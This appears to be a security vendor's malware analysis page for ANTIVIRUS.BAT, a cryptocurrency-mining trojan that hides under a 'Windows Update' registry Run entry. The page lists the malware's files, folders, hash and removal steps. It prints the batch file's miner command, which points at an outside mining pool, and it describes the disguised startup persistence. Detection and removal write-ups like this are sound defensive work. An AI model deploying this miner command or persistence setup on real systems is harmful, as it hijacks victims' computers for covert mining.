We checked up the file ANTIVIRUS.BAT and found it hazardous.
The file ANTIVIRUS.BAT must be deleted from the system immediately.
Kill the process ANTIVIRUS.BAT and remove ANTIVIRUS.BAT from the Windows startup.
Malware Analysis of ANTIVIRUS.BAT
Full path on a computer: %WinDir%\syso\critical\antivirus.bat
Detected by UnHackMe:
Item Name: Windows Update
Author:
Current Setting: %WinDir%\SYSO\CRITICAL\ANTIVIRUS.BAT
Type: Registry Run
ANTIVIRUS.BAT listing:
system.exe –algo scrypt –s 6 –threads 4 –url stratum+tcp://mine.pool-x.eu:9000 –userpass hitmanuk.4:123
Removal Results: Success
Number of reboot: 1
ANTIVIRUS.BAT is known as:
Trojan.BitCoin
ANTIVIRUS.BAT hash:
- MD5: 6d773b3bdfe2e132c4e532d53fb43e38
How to quickly detect ANTIVIRUS.BAT presence?
![]( "Registry")
Registry:
![]( "Folders")
Folders:
![]( "Files")
Files:
Registry:- HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update: “C:\Windows\syso\critical\antivirus.bat”
Folders:- %WinDir%\syso
- %WinDir%\syso\critical
Files:- %SysDir%\nircmd.exe
- %WinDir%\syso\critical\antivirus.bat
- %WinDir%\syso\critical\libcurl-4.dll
- %WinDir%\syso\critical\libcurl.dll
- %WinDir%\syso\critical\pthreadGC2.dll
- %WinDir%\syso\critical\sys.bat
- %WinDir%\syso\critical\system.exe
- %WinDir%\syso\critical\zlib1.dll